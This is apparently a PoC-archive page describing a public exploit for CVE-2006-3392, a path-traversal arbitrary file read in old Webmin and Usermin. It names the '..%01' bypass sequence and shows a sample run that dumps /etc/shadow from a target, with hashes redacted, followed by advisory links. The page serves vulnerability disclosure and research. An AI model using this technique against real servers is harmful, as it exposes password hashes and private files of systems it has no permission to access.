Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2006-3392 PoC — Webmin/Usermin未明信息泄露漏洞

Source
https://github.com/MrEmpy/CVE-2006-3392
Associated Vulnerability
Title:Webmin/Usermin未明信息泄露漏洞 (CVE-2006-3392)
Description:Webmin 1.290之前版本和Usermin 1.220之前版本在解码HTML之前调用simplify_path 函数,可以使远程攻击者读取任意文件,比如使用"..%01"序列,该序列可在从文件名中删除诸如"%01"等字节之前绕过"../" 序列的删除。注: 此漏洞不同于CVE-2006-3274。
Readme
# CVE-2006-3392

## Description

Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.

## Execution
```
$ python3 CVE-2006-3392.py -u http://127.0.0.1:10000


   _______      ________    ___   ___   ___    __       ____ ____   ___ ___  
  / ____\ \    / /  ____|  |__ \ / _ \ / _ \  / /      |___ \___ \ / _ \__ \ 
 | |     \ \  / /| |__ ______ ) | | | | | | |/ /_ ______ __) |__) | (_) | ) |
 | |      \ \/ / |  __|______/ /| | | | | | | '_ \______|__ <|__ < \__, |/ / 
 | |____   \  /  | |____    / /_| |_| | |_| | (_) |     ___) |__) |  / // /_ 
  \_____|   \/   |______|  |____|\___/ \___/ \___/     |____/____/  /_/|____|

                              [Coded by MrEmpy]

[*] File path: /etc/shadow
root:[REDACTED]:17406:0:99999:7:::
daemon:*:17047:0:99999:7:::
bin:*:17047:0:99999:7:::
sys:*:17047:0:99999:7:::
sync:*:17047:0:99999:7:::
games:*:17047:0:99999:7:::
man:*:17047:0:99999:7:::
lp:*:17047:0:99999:7:::
mail:*:17047:0:99999:7:::
news:*:17047:0:99999:7:::
uucp:*:17047:0:99999:7:::
proxy:*:17047:0:99999:7:::
www-data:*:17047:0:99999:7:::
backup:*:17047:0:99999:7:::
list:*:17047:0:99999:7:::
irc:*:17047:0:99999:7:::
gnats:*:17047:0:99999:7:::
nobody:*:17047:0:99999:7:::
libuuid:!:17047:0:99999:7:::
Debian-exim:!:17047:0:99999:7:::
statd:*:17047:0:99999:7:::
sshd:*:17047:0:99999:7:::
mysql:!:17047:0:99999:7:::
proftpd:!:17406:0:99999:7:::
ftp:*:17406:0:99999:7:::
webmaster:[REDACTED]:17406:0:99999:7:::
```

## References
* https://nvd.nist.gov/vuln/detail/CVE-2006-3392
* http://attrition.org/pipermail/vim/2006-July/000923.html
* http://attrition.org/pipermail/vim/2006-June/000912.html
* http://secunia.com/advisories/20892
* http://secunia.com/advisories/21105
* http://secunia.com/advisories/21365
* http://secunia.com/advisories/22556
* http://security.gentoo.org/glsa/glsa-200608-11.xml
* http://www.debian.org/security/2006/dsa-1199
* http://www.kb.cert.org/vuls/id/999601
* http://www.mandriva.com/security/advisories?name=MDKSA-2006:125
* http://www.osvdb.org/26772
* http://www.securityfocus.com/archive/1/439653/100/0/threaded
* http://www.securityfocus.com/archive/1/440125/100/0/threaded
* http://www.securityfocus.com/archive/1/440466/100/0/threaded
* http://www.securityfocus.com/archive/1/440493/100/0/threaded
* http://www.securityfocus.com/bid/18744
* http://www.vupen.com/english/advisories/2006/2612
* http://www.webmin.com/changes.html
File Snapshot

 [4.0K]  /data/pocs/16212920a82c70c6aa2f30be95c119d3f62cb174
├── [1.0K]  CVE-2006-3392.py
├── [ 34K]  LICENSE
└── [2.6K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.